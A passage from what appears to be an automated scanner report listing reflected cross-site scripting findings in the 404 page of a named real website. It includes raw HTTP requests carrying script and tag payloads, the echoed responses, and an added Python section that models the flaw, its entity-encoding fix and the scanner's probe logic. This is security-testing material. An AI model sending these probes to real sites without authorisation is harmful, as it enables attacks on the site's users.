This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6cb60c<script>alert(1)</script>dba326aff6f/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6cb60c<script>alert(1)</script>dba326aff6f/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3534. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c24b6<script>alert(1)</script>1d919bf4bb5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themesc24b6<script>alert(1)</script>1d919bf4bb5/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themesc24b6<script>alert(1)</script>1d919bf4bb5/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3535. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 24780<script>alert(1)</script>365170f8020 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos24780<script>alert(1)</script>365170f8020/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos24780<script>alert(1)</script>365170f8020/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3536. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 30aa0<script>alert(1)</script>17e494db8ea was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/search.php30aa0<script>alert(1)</script>17e494db8ea?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/search.php30aa0<script>alert(1)</script>17e494db8ea?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3537. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1b28c<a>693fb226258 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/search.php?keyword=search...&Submit3=Search1b28c<a>693fb226258&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/search.php?keyword=search...&Submit3=Search1b28c<a>693fb226258&opt=2 was not found on this server.</p>
...[SNIP]...
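
Every finding on this path (2.3533 through 2.3537, and the same pattern on the other /detail/ paths that follow) has a single sink: the application's own 404 handler places the raw request URI into the text of "<p>The requested URL ... was not found on this server.</p>". Anything in a path segment, a query parameter value, or even the name of a query parameter therefore comes back as HTML text. The Python below is an added example, not code from this report or from resellerbase.com. The PHP behind the 404 page was not captured, so render_404_vulnerable and the blacklist variant are hypothetical stand-ins for it; the base URI, the injection points and the shape of the probes are the ones shown on this page, with fixed marker strings instead of the scanner's random ones. It models the echo, shows the entity-encoding fix for a between-tags context, and re-implements the grading the report uses: a raw <script> reflection is reported as Certain, while a reflection where only a bare <a> tag survives is reported as Firm.

```python
import html
import re

# Constructed template mirroring the markup seen in the report's 404 responses.
TEMPLATE = (
    '<html><head><title>Error 404 - Page Not Found</title></head><body>'
    '<p>The requested URL {uri} was not found on this server.</p>'
    '</body></html>'
)

# Base request taken from the findings above.
BASE_URI = '/detail/6/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2'

# Scanner-style probes: a marker on each side makes the echo searchable in the
# body. Fixed values here (the scanner uses random ones) so runs are deterministic.
SCRIPT_PROBE = 'aaaaa<script>alert(1)</script>bbbbbbbbbbb'   # Certain-grade probe
TAG_PROBE = 'ccccc<a>ddddddddddd'                             # Firm-grade fallback probe


def render_404_vulnerable(request_uri: str) -> str:
    """Hypothetical stand-in for the handler observed on the page: the raw
    request URI is placed into HTML text with no encoding."""
    return TEMPLATE.format(uri=request_uri)


def render_404_blacklisted(request_uri: str) -> str:
    """Hypothetical 'obstacle' of the kind the Firm findings allude to: a
    blacklist that strips <script> blocks but lets any other tag through."""
    cleaned = re.sub(r'(?is)<script\b.*?</script>', '', request_uri)
    return TEMPLATE.format(uri=cleaned)


def render_404_fixed(request_uri: str) -> str:
    """Correct handling for the 'plain text between tags' context: entity-encode
    & < > " ' (the PHP equivalent is htmlspecialchars($uri, ENT_QUOTES))."""
    return TEMPLATE.format(uri=html.escape(request_uri, quote=True))


def inject(base_uri: str, point: str, payload: str) -> str:
    """Build the request URI for the three kinds of injection point on the page:
    'rest:N' appends to the N-th path segment (REST URL parameter N),
    'param:NAME' appends to that query value, and 'param-name' adds a new
    parameter whose name is the payload."""
    path, _, query = base_uri.partition('?')
    if point.startswith('rest:'):
        segs = path.split('/')            # leading '' then 'detail', '6', ...
        segs[int(point[5:])] += payload
        path = '/'.join(segs)
    elif point.startswith('param:'):
        name = point[6:]
        pairs = [kv.split('=', 1) for kv in query.split('&')]
        query = '&'.join(f'{k}={v + payload if k == name else v}' for k, v in pairs)
    elif point == 'param-name':
        query = f'{query}&{payload}=1'
    else:
        raise ValueError(point)
    return path + ('?' + query if query else '')


def grade(body_after_script_probe: str, body_after_tag_probe: str) -> str:
    """Scanner-style confidence: raw <script> echoed -> Certain; only a bare tag
    echoed -> Firm (tags inject, a JS proof-of-concept still needs manual work);
    nothing echoed unmodified -> None."""
    if SCRIPT_PROBE in body_after_script_probe:
        return 'Certain'
    if TAG_PROBE in body_after_tag_probe:
        return 'Firm'
    return 'None'


def scan(base_uri: str, render) -> dict:
    """Probe every injection point the page lists against one 404 renderer."""
    points = ['rest:1', 'rest:2', 'rest:3', 'rest:4', 'rest:5',
              'param:keyword', 'param:Submit3', 'param:opt', 'param-name']
    return {
        p: grade(render(inject(base_uri, p, SCRIPT_PROBE)),
                 render(inject(base_uri, p, TAG_PROBE)))
        for p in points
    }


if __name__ == '__main__':
    for name, renderer in [('vulnerable', render_404_vulnerable),
                           ('blacklisted', render_404_blacklisted),
                           ('fixed', render_404_fixed)]:
        print(name, scan(BASE_URI, renderer))
```

Two points to keep in mind when reproducing these findings by hand. First, a Firm grade does not mean the sink is safer: the blacklist variant above still reflects every tag except <script>, which is why the report keeps Severity at High and asks for manual follow-up. Second, the scanner writes the probe into the request line byte for byte; browsers that follow the WHATWG URL standard percent-encode < and > in both the path and the query before the request leaves the client, so confirm the echo with a raw HTTP client that sends the request line verbatim rather than by pasting the URL into a browser.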

2.3538. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1b71d<a>62ef27d1f27 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/search.php?keyword=search...1b71d<a>62ef27d1f27&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/search.php?keyword=search...1b71d<a>62ef27d1f27&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3539. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b1693<script>alert(1)</script>6fb8cee8239 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&b1693<script>alert(1)</script>6fb8cee8239=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&b1693<script>alert(1)</script>6fb8cee8239=1 was not found on this server.</p>
...[SNIP]...

2.3540. http://www.resellerbase.com/detail/6/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 14921<a>32ef0ff3837 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=214921<a>32ef0ff3837 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=214921<a>32ef0ff3837 was not found on this server.</p>
...[SNIP]...

2.3541. http://www.resellerbase.com/detail/6/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0554<script>alert(1)</script>a26902eafb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf0554<script>alert(1)</script>a26902eafb8/6/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf0554<script>alert(1)</script>a26902eafb8/6/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3542. http://www.resellerbase.com/detail/6/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3d0a<script>alert(1)</script>ec40cc0fc8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6b3d0a<script>alert(1)</script>ec40cc0fc8b/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6b3d0a<script>alert(1)</script>ec40cc0fc8b/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3543. http://www.resellerbase.com/detail/6/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fadd4<script>alert(1)</script>50bd42c03b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themesfadd4<script>alert(1)</script>50bd42c03b7/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themesfadd4<script>alert(1)</script>50bd42c03b7/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3544. http://www.resellerbase.com/detail/6/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 27818<script>alert(1)</script>45edd60568b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/search.php27818<script>alert(1)</script>45edd60568b?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/search.php27818<script>alert(1)</script>45edd60568b?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3545. http://www.resellerbase.com/detail/6/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 42bbf<a>21abd74aab1 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/search.php?keyword=search...&Submit3=Search42bbf<a>21abd74aab1&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/search.php?keyword=search...&Submit3=Search42bbf<a>21abd74aab1&opt=2 was not found on this server.</p>
...[SNIP]...

2.3546. http://www.resellerbase.com/detail/6/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 126fa<a>625673d7ac2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/search.php?keyword=search...126fa<a>625673d7ac2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/search.php?keyword=search...126fa<a>625673d7ac2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3547. http://www.resellerbase.com/detail/6/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 45442<script>alert(1)</script>9c6f1b5a3c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/search.php?keyword=search...&Submit3=Search&opt=2&45442<script>alert(1)</script>9c6f1b5a3c2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/search.php?keyword=search...&Submit3=Search&opt=2&45442<script>alert(1)</script>9c6f1b5a3c2=1 was not found on this server.</p>
...[SNIP]...

2.3548. http://www.resellerbase.com/detail/6/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/6/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c1bb1<a>39a9d2c4f02 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/search.php?keyword=search...&Submit3=Search&opt=2c1bb1<a>39a9d2c4f02 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/search.php?keyword=search...&Submit3=Search&opt=2c1bb1<a>39a9d2c4f02 was not found on this server.</p>
